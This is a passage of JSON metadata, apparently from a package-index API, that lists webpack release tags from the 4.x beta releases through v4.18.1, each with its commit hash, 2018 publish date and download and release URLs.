ame":"v4.18.1","sha":"c51a1bab94e4ff8ffca443e4fcb038bc4911e65e","kind":"tag","published_at":"2018-09-13T10:22:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.18.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.1/manifests"},{"name":"v4.18.0","sha":"ee7d9485fa30d1d3d5adbfdfb52c8f57ae8b439e","kind":"tag","published_at":"2018-09-10T15:34:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.18.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.0/manifests"},{"name":"v4.17.3","sha":"ee27d36e7cb0bed3ca32911165bbf01fef993e48","kind":"tag","published_at":"2018-09-10T14:25:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.3/manifests"},{"name":"v4.17.2","sha":"dfe6379052598a00f13bfa4f34ac73856ddf3dd0","kind":"tag","published_at":"2018-09-03T17:25:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.2/manifests"},{"name":"v4.17.1","sha":"ff3ef5eb284ddcd3da8c3f5bef6318e873779ffe","kind":"tag","published_at":"2018-08-22T09:50:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.1/manifests"},{"name":"v4.17.0","sha":"6f1f18f84dee330ec582d4e9c075c47c9a732102","kind":"tag","published_at":"2018-08-21T08:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.0/manifests"},{"name":"v4.16.5","sha":"025338cc91a867768325120d325b341bdcdc4321","kind":"tag","published_at":"2018-08-06T07:13:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.5/manifests"},{"name":"v4.16.4","sha":"1e9d98cb4e52a6efc58f516aa7451d1faa6347ba","kind":"tag","published_at":"2018-08-02T13:46:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.4/manifests"},{"name":"v4.16.3","sha":"482ff200303e84a65bdd5c456ce232309a6ce450","kind":"tag","published_at":"2018-07-27T10:14:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.3/manifests"},{"name":"v4.16.2","sha":"0d4c87fcf261de02a6ecfb05faab235c5a2a92dc","kind":"tag","published_at":"2018-07-23T09:51:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.2/manifests"},{"name":"v4.16.1","sha":"fa02f3d03344913f0a02d29cb363581bc8535bef","kind":"tag","published_at":"2018-07-16T08:27:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.1/manifests"},{"name":"v4.16.0","sha":"18d33c630f799e99e5e43fc0b6931713dc976529","kind":"tag","published_at":"2018-07-11T08:45:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.0/manifests"},{"name":"v4.15.1","sha":"81149be5c1cd2a3ce70c3abcc179c5070fd6dd1c","kind":"tag","published_at":"2018-07-05T13:32:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.15.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.1/manifests"},{"name":"v4.15.0","sha":"bdd4442c449b41d2a0ea7ed0de9cded3ba0e2e31","kind":"tag","published_at":"2018-07-04T19:42:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.0/manifests"},{"name":"v4.14.0","sha":"190cf7b017c9d4106c83553a1de652e53452b095","kind":"tag","published_at":"2018-06-29T12:12:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.14.0/manifests"},{"name":"v4.13.0","sha":"e3678aa3767aaeb26ebcf5e3028412bbebdb4f9f","kind":"tag","published_at":"2018-06-28T15:34:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.13.0/manifests"},{"name":"v4.12.2","sha":"c384c3fb1c162667d001f467db05e73570ddd4d2","kind":"tag","published_at":"2018-06-27T05:39:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.2/manifests"},{"name":"v4.12.1","sha":"8a7597aa6eb2eef66a8f9db3a0c49bcb96022a94","kind":"tag","published_at":"2018-06-24T08:44:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.1/manifests"},{"name":"v4.12.0","sha":"02a955b4335cb7eeeb4dd1c96ef5407c6bcea158","kind":"tag","published_at":"2018-06-08T07:24:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.0/manifests"},{"name":"v4.11.1","sha":"956c0b12dcc274f5e5725fc5abc51f805d916f43","kind":"tag","published_at":"2018-06-06T07:02:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.11.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.1/manifests"},{"name":"v4.11.0","sha":"e2fe2009d9f2b26a8d751ea89e184d6ec96e37d7","kind":"tag","published_at":"2018-06-05T11:25:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.0/manifests"},{"name":"v4.10.2","sha":"b8266d09a9472344a4894f1d8cf4067eb452019c","kind":"tag","published_at":"2018-05-30T08:29:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.2/manifests"},{"name":"v4.10.1","sha":"b80296f0c8b3907a8c96e4146bfb21746346fbb0","kind":"tag","published_at":"2018-05-29T13:38:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.1/manifests"},{"name":"v4.10.0","sha":"ba703401d580ad623af17fe96ed98b4d801e0313","kind":"tag","published_at":"2018-05-28T23:12:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.0/manifests"},{"name":"v4.9.2","sha":"317fb353518179c50342b1ac826d393a85b5903e","kind":"tag","published_at":"2018-05-28T20:28:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.2/manifests"},{"name":"v4.9.1","sha":"94cd709b06ffc7071b3505a746f0bb17fb7e3c33","kind":"tag","published_at":"2018-05-25T21:30:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.1/manifests"},{"name":"v4.9.0","sha":"bb0731d7897fb8a7369efd9d2f9bf0a8c08d546d","kind":"tag","published_at":"2018-05-25T20:17:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.0/manifests"},{"name":"v4.8.3","sha":"9a72294918064d6b976538adf808808de948585f","kind":"tag","published_at":"2018-05-12T20:56:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.3/manifests"},{"name":"v4.8.2","sha":"c92eabd3be44d4162be0affc9ef368624b0a6e51","kind":"tag","published_at":"2018-05-11T16:13:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.2/manifests"},{"name":"v3.12.0","sha":"cce33c206abaeef26d06b62102adf74a989a4696","kind":"tag","published_at":"2018-05-11T14:50:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.12.0/manifests"},{"name":"v4.8.1","sha":"2986ab1a18e895ac3f2546ac0c70bf73c0fdb679","kind":"tag","published_at":"2018-05-07T21:03:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.1/manifests"},{"name":"v4.8.0","sha":"586f9a21768e8bbc6bead6e564a6c7981a42f2d8","kind":"tag","published_at":"2018-05-07T11:39:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.0/manifests"},{"name":"v4.7.0","sha":"673c103715b5439bf72ed9767f5189b92ce7d428","kind":"tag","published_at":"2018-05-04T11:57:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.7.0/manifests"},{"name":"v4.6.0","sha":"e7c8fa414b718ac98d94a96e2553faceabfbc92f","kind":"tag","published_at":"2018-04-17T16:23:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.6.0/manifests"},{"name":"v4.5.0","sha":"e400445445a2f91d19aa8c79aa7b34b66011e661","kind":"tag","published_at":"2018-04-04T13:07:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.5.0/manifests"},{"name":"v4.4.1","sha":"0e404b8683d79052e3a6b42743bd3061f17a5a5d","kind":"tag","published_at":"2018-03-29T15:28:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.1/manifests"},{"name":"v4.4.0","sha":"e3bb8c9c8f5a30884b4df01bfbbc772cc1fb8cda","kind":"tag","published_at":"2018-03-29T14:57:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.0/manifests"},{"name":"v4.3.0","sha":"54ceb3c04d513ef5c7b78eaf4d391d14cfbe8282","kind":"tag","published_at":"2018-03-27T09:00:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.3.0/manifests"},{"name":"v4.2.0","sha":"d668a23fdc69c61ab80ec8db89a5b49778559534","kind":"tag","published_at":"2018-03-21T08:26:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.2.0/manifests"},{"name":"v4.1.1","sha":"41bb63ad69d0f32c042e74e732cb045b5966c452","kind":"tag","published_at":"2018-03-07T15:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.1/manifests"},{"name":"v4.1.0","sha":"f916fc0bb70585cf04a92cd99e004e4879f1d337","kind":"tag","published_at":"2018-03-04T10:39:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.0/manifests"},{"name":"v4.0.1","sha":"5044762c846a3a83a208853e48785a293fe9ef7d","kind":"tag","published_at":"2018-02-26T20:11:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"213226ece261a0e89edb9de15fbc6775418f6041","kind":"tag","published_at":"2018-02-25T02:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0/manifests"},{"name":"v4.0.0-beta.3","sha":"4c25bfbaf2e01cf23708a381319b43367701e5b5","kind":"tag","published_at":"2018-02-24T14:55:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.3/manifests"},{"name":"v4.0.0-beta.2","sha":"2ad530e4b486c248758f6d9d94070f207ef5f2e9","kind":"tag","published_at":"2018-02-17T13:10:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.2/manifests"},{"name":"v3.11.0","sha":"bc840ec8747ba19c9e87629f2959ed2e65a9ffbe","kind":"tag","published_at":"2018-02-10T14:37:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.11.0/manifests"},{"name":"v4.0.0-beta.1","sha":"df65475ba32a5881f48ab9d90e1c010ea57c3d65","kind":"tag","published_at":"2018-02-10T14:10:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.1/manifests"},{"name":"v4.0.0-beta.0","sha":"ae0d